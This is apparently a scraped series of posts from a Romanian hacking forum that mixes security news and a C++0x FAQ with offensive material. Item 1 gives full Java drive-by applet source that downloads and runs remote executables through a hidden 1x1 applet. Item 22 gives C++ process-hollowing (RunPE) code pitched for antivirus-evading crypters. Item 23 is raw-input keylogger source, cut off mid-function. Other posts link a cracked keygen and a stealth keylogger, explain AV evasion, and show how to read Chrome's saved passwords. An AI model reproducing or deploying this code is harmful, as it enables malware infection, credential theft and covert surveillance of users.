
  1. Java Drive-By - Source Code Nu11 So umm there isn't any java forum and it's not worth making one so I'm posting it here The source is completely commented & compiles with latest java Java Source: import java.applet.Applet; import java.io.BufferedOutputStream; import java.io.BufferedReader; import java.io.File; import java.io.FileOutputStream; import java.io.FileReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStream; import java.net.URL; import java.net.URLConnection; import java.security.AccessControlException; import java.util.ArrayList; // //Change Example to what you want users to see as your Applet Name @SuppressWarnings("serial") public class Exploit extends Applet{ //Same here public Exploit(){ } public String getContents(File aFile) { StringBuilder contents = new StringBuilder(); try { BufferedReader input = new BufferedReader(new FileReader(aFile)); try { String line = null; //not declared within while loop while (( line = input.readLine()) != null){ contents.append(line); contents.append(System.getProperty("line.separator")); } } finally { input.close(); } } catch (IOException ex){ ex.printStackTrace(); } return contents.toString(); } public String getConfig(String link){ try { URLConnection url = null; BufferedReader in = null; url = new URL(link).openConnection(); in = new BufferedReader(new InputStreamReader(url.getInputStream())); String str = in.readLine(); if (in != null) { in.close(); } return str; } catch (final IOException e) { } return null; } public ArrayList<String> getConfigArray(String link){ URLConnection url = null; String line; ArrayList<String> file = new ArrayList<String>(); try { url = new URL(link).openConnection(); BufferedReader in = new BufferedReader(new InputStreamReader(url.getInputStream())); while ((line = in.readLine()) != null) file.add(line); if (in != null) { in.close(); } return file; } catch (final IOException e) { } return null; } public 
ArrayList<String> loadFile(String fileName) { if ((fileName == null) || (fileName == "")) throw new IllegalArgumentException(); String line; ArrayList<String> file = new ArrayList<String>(); try { BufferedReader in = new BufferedReader(new FileReader(fileName)); if (!in.ready()) throw new IOException(); while ((line = in.readLine()) != null) file.add(line); in.close(); } catch (IOException e) { System.out.println(e); return null; } return file; } //Main Method public void start() throws AccessControlException{ String userdir = System.getProperty("user.home"); String configs = "config.ini"; String urlss = "urls.ini"; String filess = "files.ini"; //FULL PATH TO YOUR WEBSITE HERE(WERE JAR IS GOING TO BE PALCED)\\ String mainURL = "http://site.com/"; ///////////////////////////////////////////////////Do not touch anything below\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ //try{ //////////////////////////////////FILE 1////////////////////////////////// if(getConfig(mainURL+configs).contains("1") || getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname = "\\"+getConfigArray(mainURL+filess).get(0); String fpath = userdir.concat(fname); final String locationDownload = getConfigArray(mainURL+urlss).get(0); download(locationDownload, fpath); final Runtime run = Runtime.getRuntime(); try { run.exec(fpath); } catch (final IOException e) { } } //////////////////////////////////FILE 2////////////////////////////////// if(getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname2 = "\\"+getConfigArray(mainURL+filess).get(1); final Runtime run = Runtime.getRuntime(); String fpath2 = userdir.concat(fname2); final String locationDownload2 = getConfigArray(mainURL+urlss).get(1); download(locationDownload2, fpath2); try { run.exec(fpath2); } catch (final IOException e){ } } 
//////////////////////////////////FILE 3///////////////////////////////// if(getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname3 = "\\"+getConfigArray(mainURL+filess).get(2); final Runtime run = Runtime.getRuntime(); String fpath3 = userdir.concat(fname3); final String locationDownload3 = getConfigArray(mainURL+urlss).get(2); download(locationDownload3, fpath3); try { run.exec(fpath3); } catch (final IOException e){ } } /////////////////////////////////FILE 4////////////////////////////////// if(getConfig(mainURL+configs).contains("4")){ String fname4 = "\\"+getConfigArray(mainURL+filess).get(3); final Runtime run = Runtime.getRuntime(); String fpath4 = userdir.concat(fname4); final String locationDownload3 = getConfigArray(mainURL+urlss).get(3); download(locationDownload3, fpath4); try { run.exec(fpath4); } catch (final IOException e){ } } ////////////////////////////////END/////////////////////////////////// //}catch (AccessControlException e){ // System.out.println("hi"); // } } public void download(final String address, final String localFileName) { OutputStream out = null; URLConnection conn = null; InputStream in = null; try { final URL url = new URL(address); out = new BufferedOutputStream(new FileOutputStream(localFileName)); conn = url.openConnection(); in = conn.getInputStream(); final byte[] buffer = new byte[1024]; int numRead; while ((numRead = in.read(buffer)) != -1) { out.write(buffer, 0, numRead); } } catch (final Exception exception) { } finally { try { if (in != null) { in.close(); } if (out != null) { out.close(); } } catch (final IOException ioe) { } } } public void main(String args[]){ start(); } public void stop(){ } } Create the config.ini in notepad and just put a numeric value for the amount of exe's you want it to execute. 
if you're only having it dl/exec 1 file then for the value put 1 Create the files.ini in notepad and just put the name of the file its going to download, if you're hosting the file as blah.exe just put blah.exe Create the urls.ini and just put the full download link of whatever file you want it to download and execute. have fun Apoi: <applet width='1' height='1' code='java.class' archive='java.jar'> </applet> Sursa: Java Drive-By (Not Really), Full Source Code
  2. RealVNC Enterprise v4.6.0+keygen Nu l-am descarcat, nu stiu daca e infectat, executati pe riscul vostru. RealVNC Enterprise v4.6.0 Incl Keymaker-CORE | 5.85 MB VNC® Enterprise Edition - A greatly enhanced version of VNC, developed for use in enterprises of all sizes. Designed and built from the ground up by the original inventors of VNC, Enterprise Edition provides secure, robust and easily-administered remote-control with a minimum of fuss. Existing Free Edition users considering upgrading may find this feature comparison useful. There is also a handy datasheet (pdf). FEATURES : Printing Cross-Platform VNC Chat Integrated Session Security [new] System Authentication One-Port HTTP & VNC HTTP Proxy Support Desktop Scaling Cross-Platform Interoperability File Transfer [new] Integrated VNC Address Book VNC Deployment Tool (Windows only) Home: http://www.realvnc.com/products/enterprise/index.html Download: http://www.filesonic.com/file/1204491664/RealVNC.Enterprise.v4.6.0.Incl.Keymaker-CORE.7z Sursa: RealVNC Enterprise v4.6.0+keygen - r00tsecurity
  3. Award Keylogger v2.6 (x86-x64) full Nu l-am descarcat, nu l-am incercat, nu stiu daca e infectat, executati pe riscul vostru. Award Keylogger v2.6 (x86-x64) | 9.36 MB Award Keylogger allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Award Keylogger makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. FEATURES : • New! Run keylogger as a Windows service • Easy-to-use, even for beginners • Absolutely invisible/stealth mode • Logs accounts and passwords typed in the every application • Logs message typed in all instant messengers • Visual surveillance, support screenshots view • Slide show for screenshots • Captures the contents behind the asterisks • Captures mouse clicks • Logs websites visited • Captures AOL/AIM/Yahoo/ICQ chats • Keyword Detection and Notification • Records contents of password protected web pages, including Web Mail messages • Logs Windows Clipboard • Sends log by e-mail • Uploads ALL logs into the separate folders by FTP • Invisible for the firewall program • Invisible in the Windows startup list • Monitors all users of the PC • User friendly HTML file format for emailed logs • Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List • Records Windows 9.x/Me/2000/XP/VISTA logon passwords • Intercepts DOS-box and Java-chat keystrokes • Supports international keyboards • External log viewer • Supports printing of the log • Optimized for Windows XP • Exports log to HTML INSTALL 1. Extract files with WinRAR 2. Install Application 3. Use the patch Download: http://www.filesonic.vn/file/1199695194 or http://www.fileserve.com/file/KUETVaP or http://bitshare.com/files/rwaig065/Award-Keylogger-v2.6--x86-x64-.rar.html Sursa: Award Keylogger v2.6 (x86-x64) full - r00tsecurity
  4. Windows XP, Vista AutoRun update reduces malware infections by 82 percent February's "backport" of the Windows 7 feature worked like a charm, says Microsoft By Gregg Keizer | Computerworld Microsoft today credited a February security update for lowering AutoRun-abusing malware infection rates on Windows XP and Vista by as much as 82 percent since the start of the year. Four months ago, Microsoft offered XP and Vista users an optional update -- which was later changed to automatically download and install -- that disabled AutoRun. [ Master your security with InfoWorld's interactive Security iGuide. | Stay up to date on the latest security developments with InfoWorld's Security Central newsletter. ] Microsoft changed AutoRun's behavior in Windows 7 to block automatic execution of files on a USB drive. It first backported the modifications to Windows XP and Vista in 2009. Until February, however, users had to manually seek out the update. With the update in place, flash drives inserted into a PC running XP or Vista no longer offer the option to run programs. AutoRun's extinction does not affect CDs or DVDs, however. The move has paid off in spades, said Microsoft today. "The infection rates for Windows XP and Vista went down ... pretty significantly, in fact," said Holly Stewart, a senior program manager with the MMPC (Microsoft Malware Protection Center), in a blog post Tuesday. According to statistics compiled by the MMPC from data delivered by the Malicious Software Removal Tool (MSRT), a free utility that detects and deletes some attack code, infection rates of malware that spreads through AutoRun plummeted after the February update reached XP and Vista. Since January 2011, the month before the AutoRun update shipped, infection rates of XP Service Pack 3 (SP3) -- the sole version still supported by Microsoft -- have dropped by 62 percent. Vista SP1's infection rate has fallen by 68% while Vista SP2's has plunged by 82 percent in the same period. 
Microsoft will abandon support of Vista SP1 next month. "That's a huge reduction," said Andrew Storms, director of security operations at nCircle Security. "Imagine if AutoRun was never invented." Storms was talking about the fact that the Windows feature was abused by some of the highest-profile worms in the last two years, including Conficker and Stuxnet. Microsoft credits a February update for XP and Vista for dramatically dropping infection rates of AutoRun-abusing malware. The former relied on AutoRun -- among other propagation techniques -- to infect millions of PCs, while analysts believe the latter used AutoRun to infect Iranian computers associated with the country's uranium enrichment program. Microsoft's Stewart also described an unanticipated side-effect of the update. "What was unexpected, is that there appears to have been a residual effect ...a 'secondhand smoke' kind of effect on adjacent systems that were already protected with proactive defenses," said Stewart, citing Microsoft's own security products, including the free Security Essentials and the for-a-fee, enterprise-grade Forefront line. "The infection attempts on these computers also went down immediately after the update was released." In an interview Tuesday, Jerry Bryant, a group manager with the MSRC (Microsoft Security Response Center), said that the decrease in infection attempts -- ones stymied by a Microsoft antivirus signature -- was due to the AutoRun update preventing large numbers of primary infections. "We attribute the overall decline in infections to fewer systems trying to propagate using AutoRun," said Bryant. In February, Microsoft noted that the AutoRun update would break the functionality of some USB drives. "Users who install this update will no longer receive a setup message that prompts them to install programs that are delivered by USB flash drives. Users will have to manually install the software," Microsoft warned in a security advisory at the time. 
The company has also published the "Enable Autorun" tool that customers can deploy to disable the update's changes and revert to Windows XP's and Vista's earlier behavior. Sursa: Windows XP, Vista AutoRun update reduces malware infections by 82 percent | Security - InfoWorld
  5. Probabil tehnologie anti-rootkit. Ma uitam la videoclipuri de pe Sysinternals si am vazut cam cum functioneaza. Verifica fisierele dintr-un folder folosind API-urile clasice, de exemplu. Apoi aceeasi verificare folosind acces brut la sistemul de fisiere NTFS. Daca lipseste ceva, clar, e ascuns. Asta ar fi o idee. Oricum, solutii sunt multe dar foarte complicate. Se poate verifica de SSDT hooks, e complicat. Vreau ca pe viitor sa ma axez tocmai pe acest domeniu, am inceput sa citesc Windows Internals 5th Edition. Momentan nu stiu foarte multe nici eu...
  6. Sa tii un executabil de exemplu, ca resursa, ca sectiune sau orice altceva, si acel fisier sa nu fie detectabil e banal. Eu pus si simplu adaugam "1" la fiecare octet, si 255 il faceam 0 si nu mai era detectabil. Partea detectabila e loader-ul, codul care incarca executabilul in memorie, sau dropper-ul, partea de cod in care stub-ul se autociteste sau se copiaza pe nu stiu unde, sau "Anti-****"-urile... Asta e greu. Pe ideea cryptarii sectiunii de cod a unui executabil s-ar putea face niste incercari, nu ar mai fi trebuit incarcat in memorie, doar la executie sa se modifice sectiunea de cod, entrypointul poate sa fie acelasi, dar trebuie adaugat codul de decryptare acolo, sectiunea trebuie sa fie MEM_WRITE, sunt cateva lucruri care trebuie facute, dar merge.
  7. Da, este calea mai "1337". Mai dificila, fara documentatie pentru functie... Mai interesanta si mai atragatoare. +1
  8. Vazusem un videoclip facut de muts (Mati Ahroni) bazat pe aceeasi tehnica. Nu stiu ca de eficienta e, e posibil sa fie detectata de scanarile heuristice moderne. Am vrut sa fac un packer pe aceasta idee, poate chiar o sa fac, dar am niste chestii pe cap vreo doua saptamani.
  9. Daca stiam ca o sa apara in articol, scriam si noi ceva mai concret si mai elegant. Oricum, nu suntem noi "hackeri", dar suntem persoane din domeniu... Si da, imi place articolul, e "altfel".
  10. O sa te razgandeti cu timpul, cand vei vedea ca exista si alte lucruri in afara de ce faci in liceu... Tu ai enumerat doar materie de liceu.
  11. C++0x - the next ISO C++ standard This document is written by and maintained by Bjarne Stroustrup. Constructive comments, corrections, references, and suggestions are of course most welcome. Currently, I'm working to improve completeness and clean up the references. C++0x is the next ISO C++ standard. Currently a draft is available for comments. The previous (and current) standard is often referred to as C++98 or C++03; the differences between C++98 and C++03 are so few and so technical that they ought not concern users. The final committee draft standard is currently (March 2010) being voted on by the national standards bodies. After that there will be more work before all comments have been addressed and the ISO bureaucracy satisfied. At the current stage of the proceedings, no features (even very minor ones) are expected to be added or removed. The name "C++0x" is a relic of the days when I and others hoped for a C++08 or C++09. However, to minimize confusion, I'll keep referring to the upcoming C++ standard with the feature set defined here as C++0x. Think of 'x' as hexadecimal (most likely 'B', i.e. C++11). If you have comments on C++0x, please find some member of your national standards body -- or a member of any standards body -- to send your comments to. That's now the only way and will ensure that the committee doesn't have to deal with many very similar comments. Remember, the committee consists of volunteers with limited time and resources. All official documents relating to C++0x can be found at the ISO C++ committee's website. The official name of the committee is SC22 WG21. Caveat: This FAQ will be under construction for quite a while. Comments, questions, references, corrections, and suggestions welcome. Purpose The purpose of this C++0x FAQ is To give an overview of the new facilities (language features and standard libraries) offered by C++0x in addition to what is provided by the previous version of the ISO C++ standard. 
To give an idea of the aims of the ISO C++ standards effort. To present a user's view of the new facilities To provide references to allow for a more in depth study of features. To name many of the individuals who contributed (mostly as authors of the reports they wrote for the committee). The standard is not written by a faceless organization. Please note that the purpose of this FAQ is not to provide comprehensive discussion of individual features or a detailed explanation of how to use them. The aim is to give simple examples to demonstrate what C++0x has to offer (plus references). My ideal is "max one page per feature" independently of how complex a feature is. Details can often be found in the references. Lists of questions Here are some high-level questions What do you think of C++0x? When will C++0x be a formal standard? When will compilers implement C++0x? When will the new standard libraries be available? What new language features will C++0x provide? (a list); see also the questions below What new standard libraries will C++0x provide? (a list); see also the questions below What were the aims of the C++0x effort? What specific design aims guided the committee? Where can I find the committee papers? Where can I find academic and technical papers about C++0x? (a list) Where else can I read about C++0x? (a list) Are there any videos about C++0x? (a list) Is C++0x hard to learn? How does the committee operate? Who is on the committee? In which order should an implementer provide C++0x features? Will there be a C++1x? What happened to "concepts? Are there any features you don't like? 
Questions about individual language features can be found here: __cplusplus alignments attributes atomic operations auto (type deduction from initializer) C99 features enum class (scoped and strongly typed enums) copying and rethrowing exceptions constant expressions (generalized and guaranteed;constexpr) decltype defaulted and deleted functions (control of defaults) delegating constructors Dynamic Initialization and Destruction with Concurrency explicit conversion operators extended integer types extern templates for statement; see range for statement suffix return type syntax (extended function declaration syntax) in-class member initializers inherited constructors initializer lists (uniform and general initialization) lambdas local classes as template arguments long long integers (at least 64 bits) memory model move semantics; see rvalue references Inline namespace Preventing narrowing null pointer (nullptr) PODs (generalized) range for statement raw string literals right-angle brackets rvalue references Simple SFINAE rule static (compile-time) assertions (static_assert) template alias template typedef; see template alias thread-local storage (thread_local) unicode characters Uniform initialization syntax and semantics unions (generalized) user-defined literals variadic templates I often borrow examples from the proposals. In those cases: Thanks to the proposal authors. Many of the examples are borrowed from my own talks and papers. 
Questions about individual standard library facilities can be found here: abandoning a process Improvements to algorithms array async() atomic operations Condition variables Improvements to containers function and bind forward_list a singly-linked list future and promise garbage collection ABI hash_tables; see unordered_map metaprogramming and type traits Mutual exclusion random number generators regex a regular expression library scoped allocators shared_ptr smart pointers; see shared_ptr, weak_ptr, and unique_ptr threads Time utilities tuple unique_ptr unordered_map weak_ptr system error Below are answers to the specific questions indexed above. Tutorial: http://www2.research.att.com/~bs/C++0xFAQ.html
  12. Ceva imi spune ca nu mai dureaza mult pana primesti ban...
  13. Qubes – sistem de operare Open Source construit pentru a fi sigur Andrei Avădănei, 13.06.2011 Qubes este un sistem de operare Open Source ce dispune de o arhitectură special creată pentru a oferi o experiență de navigare desktop sigură. Este bazat pe Xen, X Window System și Linux, putând rula aproape orice tip de aplicație Linux și utiliza majoritatea driverelor Linux. Autorii acestuia promit că în viitor vor include și suportul pentru rularea aplicațiilor Windows. Qubes, aflat în varianta beta, are o abordare de tipul “Securitate prin izolare”. Pentru a face asta, Qubes folosește ca principiu de bază virtualizarea, având posibilitatea să izoleze diverse programe unele de altele sau chiar diverse componente ale sistemului, precum rețeaua, subsistemul de stocare șamd. Asta încearcă să prevină afectarea integrității sistemului de problemele apărute într-un subsistem. Qubes are câteva profile create pentru mașinile virtuale (cunoscute ca AppVMs) precum “personal”, “work”, “shopping”, “bank” sau “random” și permite rularea aplicațiilor ca și cum s-ar executa pe mașina locală. Mai suportă și copierea și mutarea sigură a unei aplicații dintr-o mașină virtuală în alta. Mai multe detalii despre arhitectura sistemului de operare găsiți aici iar câteva fotografii cu acesta aici. Sursa: Qubes - sistem de operare Open Source construit pentru a fi sigur | WorldIT
  14. Spanish police website hit by Anonymous hackers 13 June 2011 Last updated at 10:50 GMT The website of Spain's national police force has been briefly knocked offline by hacker collective Anonymous. The attack on the site was carried out in retaliation for the arrest of three Spanish men the police claimed were 'core' members of the group. The hackers managed to keep Página Oficial del Cuerpo Nacional de Policía offline for about an hour from 2130 GMT on 12 June. Spanish authorities would not confirm that Anonymous was behind the attack, saying only that the site was offline. However, a statement posted on a website linked to Anonymous claimed responsibility for the hack, which it called #OpPolicia. The group said it had used a distributed denial of service attack (DDoS), which bombards a target website with so much data that it becomes overwhelmed. A spokesman for the Spanish police said the cause of the outage had not yet been established. "A website can collapse if too many people try to access it at once. I cannot confirm the link with the Anonymous group," said the spokesman. In its statement, Anonymous said the DDoS attack was a "direct response to the Friday arrests of three individuals alleged to be associated with acts of cyber civil disobedience attributed to Anonymous." The group said DDoS attacks were a legitimate form of peaceful protest. Some of its members are thought to have carried out similar attacks on Turkish government websites to protest against net censorship. Anonymous also denied that the men arrested were part of the "core" of Spanish members of the group. "They did not arrest any core group, because we don't have a core group," said Anonymous in its statement. Sursa: BBC News - Spanish police website hit by Anonymous hackers
  15. Blind Sql Injection – Regular Expressions Attack Authors: // Removed on request Index Why blind sql injection?......................................................................................................................3 How blind sql injection can be used?...................................................................................................3 Testing vulnerability (MySQL - MSSQL):........................................................................................3 Time attack (MySQL)...........................................................................................................................3 Time attack (MSSQL)..........................................................................................................................4 Regexp attack's methodology................................................................................................................5 Finding table name with Regexp attack (MySQL)...........................................................................5 Finding table name with Regexp attack (MSSQL)...........................................................................6 Exporting a value with Regexp attack (MySQL).............................................................................7 Exporting a value with Regexp attack (MSSQL).............................................................................7 Time considerations.............................................................................................................................8 Bypassing filters..................................................................................................................................9 Real life example.................................................................................................................................9 
Conclusions.........................................................................................................................................9 Download: http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf
  16. Cursul 9 lipseste, nu stiu de ce... Nu e nici la "sursa".
  17. Interesant. Dar le mut la programare, sunt mai utile acolo.
  18. Sunt materialele de curs ale unui profesor (cu care am facut si eu, dar nu criptografie) de la Universitatea Bucuresti, Facultatea de Matematica-Informatica: Adrian Atanasiu Cursul de Criptografie (semestrul 1) Cursul 1 Cursul 2 Cursul 3 Cursul 4 Cursul 5 Cursul 6 Cursul 7 Cursul 8 Cursul 9 Cursul 10 Cursul 11 Cursul 12 Cursul 13 Cursul de Criptografie (semestrul 2) Cursul 1 Cursul 2 Cursul 3 Cursul 4 Cursul 5 Cursul 6 Cursul 7 Cursul 8 Cursul 9 Sursa: http://www.galaxyng.com/adrian_atanasiu/cript.htm PS: Puteti cauta cartile dumnealui: - Securitatea informatiei - Vol. I - Criptografie - Securitatea informatiei - Vol. II - Protocoale de securitate - Arhitectura sistemelor de calcul Toate sunt de la editura InfoData cred.
  19. Da, era intr-o revista articolul, de acolo nu am stat sa il citesc, dar postat si aranjat il voi citi, thanks.
  20. Da, dar nu e tocmai genial sa iti dai seama ca e vorba de o baza de data SQLite. O poti deschide cu SQLite Explorer, sau nu stiu ce utilitar pentru astfel de baze de date si poti vedea structura, apoi "SELECT * FROM logins" si uite parolele. Daca deschizi acel fisier "C:\Users\Ionut\AppData\Local\Google\Chrome\User Data\Default\Login Data" cu Notepad, primele caractere sunt: "SQLite format 3", apoi gasesti si: "CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL,ssl_valid INTEGER NOT NULL,preferred INTEGER NOT NULL,date_created INTEGER NOT NULL,blacklisted_by_user INTEGER NOT NULL,scheme INTEGER NOT NULL,UNIQUE (origin_url, username_element, username_value, password_element, submit_element, signon_realm))" care spune tot ce iti trebuie.
  21. PS: Ideea e urmatoarea: baiatul de la Jurnalul, pe langa faptul ca nu e deloc paralel cu domeniul, a colaborat in nenumarate randuri cu Hackersblog. Deci e o legatura intre RST si Jurnalul. Cum spunea si el: daca scrie cineva un articol, fara sa va intrebe pe voi, atot-cunoscatorii, nu e bine. Daca va intreaba, tot nu e bine. Deci sunteti ratati. Ontopic: Probabil e vorba de un simplu SQL Injection. Ce vreau sa spun: in ziua de azi sunt foarte multe persoane care "stiu" SQL Injection si foarte multe dintre ele, pe langa aerele de hackeri mondiali doresc sa se faca remarcati. Si da, acest tip de atac, pe langa faptul ca nu e foarte dificil, poate avea rezultate frumusele: de la acces la datele din baza de date la root pe serverul pe care il ataca. Probabil e vorba de cineva care incearca sa se faca remarcat. Nu cred ca e vorba de ceva mai complex, daca se baga vreo organizatie guvernamentala probabil ar fi aparut si alte probleme, politice de exemplu. Si atacul nu ar fi fost simplu, probabil ar fi scanat mai intai intreaga retea a FMI-ului, sa obtina cat mai multe informatii, posibil sa se fi folosit de persoane din interior... Eu raman la ideea ca un pusti cu atitudine de "hacker" s-a gandit sa caute SQL Injection (sau LFI, XSS... ) intr-un site mare, o fi cautat pe Google in functie de un dork si ce a gasit? FMI...
  22. [c++] Run Program From Memory And Not File Author: Galco void RunFromMemory(char* pImage,char* pPath) { DWORD dwWritten = 0; DWORD dwHeader = 0; DWORD dwImageSize = 0; DWORD dwSectionCount = 0; DWORD dwSectionSize = 0; DWORD firstSection = 0; DWORD previousProtection = 0; DWORD jmpSize = 0; IMAGE_NT_HEADERS INH; IMAGE_DOS_HEADER IDH; IMAGE_SECTION_HEADER Sections[1000]; PROCESS_INFORMATION peProcessInformation; STARTUPINFO peStartUpInformation; CONTEXT pContext; char* pMemory; char* pFile; memcpy(&IDH,pImage,sizeof(IDH)); memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH)); dwImageSize = INH.OptionalHeader.SizeOfImage; pMemory = (char*)malloc(dwImageSize); memset(pMemory,0,dwImageSize); pFile = pMemory; dwHeader = INH.OptionalHeader.SizeOfHeaders; firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS)); memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections); memcpy(pFile,pImage,dwHeader); if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = INH.OptionalHeader.SizeOfHeaders; } else { jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++) { jmpSize = 0; dwSectionSize = Sections[dwSectionCount].SizeOfRawData; memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize); if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = Sections[dwSectionCount].Misc.VirtualSize; } else { jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); } memset(&peStartUpInformation,0,sizeof(STARTUPINFO)); 
memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION)); memset(&pContext,0,sizeof(CONTEXT)); peStartUpInformation.cb = sizeof(peStartUpInformation); if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation)) { hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); pContext.ContextFlags = CONTEXT_FULL; GetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten); pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0); ResumeThread(peProcessInformation.hThread); } free(pMemory); } This function will run a process based on it's memory instead of running a process from a file. Meaning, you can use this in crypters to have fud runtime. 
You can basically load an exe as a resource into your code and run it as a process like this: int main(int argc,char* argv[]) { HGLOBAL hResData; HRSRC hResInfo; void *pvRes; DWORD dwSize; char* lpMemory; HMODULE hModule = GetModuleHandle(NULL); if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), "EXE")) != NULL) &&((hResData = LoadResource(hModule, hResInfo)) != NULL) &&((pvRes = LockResource(hResData)) != NULL)) { dwSize = SizeofResource(hModule, hResInfo); lpMemory = (char*)malloc (dwSize); memset(lpMemory,0,dwSize); memcpy (lpMemory, pvRes, dwSize); RunFromMemory(lpMemory,argv[0]); } } The program running the process must have the same image base or else it will not work. By the way, ignore these two lines: hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); I forgot to edit them out when I posted the function. Lol. Dont ask what they were used for. Sursa: [c++] Run Program From Memory And Not File - rohitab.com - Forums
  23. [C] GetRawInputData() keylogger Author: defsanguje Just an another way to implement an user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc) at low level. More info can be found here. #define _WIN32_WINNT 0x0501 #include <windows.h> // Definitions int LogKey(HANDLE hLog, UINT vKey); LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow); // Globals const char g_szClassName[] = "klgClass"; // Window procedure of our message-only window LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { static HANDLE hLog; UINT dwSize; RAWINPUTDEVICE rid; RAWINPUT *buffer; switch(msg) { case WM_CREATE: // Register a raw input device to capture keyboard input rid.usUsagePage = 0x01; rid.usUsage = 0x06; rid.dwFlags = RIDEV_INPUTSINK; rid.hwndTarget = hwnd; if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE))) { MessageBox(NULL, "Registering raw input device failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return -1; } // open log.txt hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if(hLog == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Creating log.txt failed!", "Error", MB_ICONEXCLAMATION|MB_OK); return -1; } // append SetFilePointer(hLog, 0, NULL, FILE_END); break; case WM_INPUT: // request size of the raw input buffer to dwSize GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER)); // allocate buffer for input data buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize); if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize, sizeof(RAWINPUTHEADER))) { // if this is keyboard message and WM_KEYDOWN, log the key if(buffer->header.dwType == RIM_TYPEKEYBOARD && 
buffer->data.keyboard.Message == WM_KEYDOWN) { if(LogKey(hLog, buffer->data.keyboard.VKey) == -1) DestroyWindow(hwnd); } } // free the buffer HeapFree(GetProcessHeap(), 0, buffer); break; case WM_DESTROY: if(hLog != INVALID_HANDLE_VALUE) CloseHandle(hLog); PostQuitMessage(0); break; default: return DefWindowProc(hwnd, msg, wParam, lParam); } return 0; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { WNDCLASSEX wc; HWND hwnd; MSG msg; // register window class ZeroMemory(&wc, sizeof(WNDCLASSEX)); wc.cbSize = sizeof(WNDCLASSEX); wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = g_szClassName; if(!RegisterClassEx(&wc)) { MessageBox(NULL, "Window Registration Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return 0; } // create message-only window hwnd = CreateWindowEx( 0, g_szClassName, NULL, 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, hInstance, NULL ); if(!hwnd) { MessageBox(NULL, "Window Creation Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return 0; } // the message loop while(GetMessage(&msg, NULL, 0, 0) > 0) { TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; } int LogKey(HANDLE hLog, UINT vKey) { DWORD dwWritten; BYTE lpKeyboard[256]; char szKey[32]; WORD wKey; char buf[32]; int len; // Convert virtual-key to ascii GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); 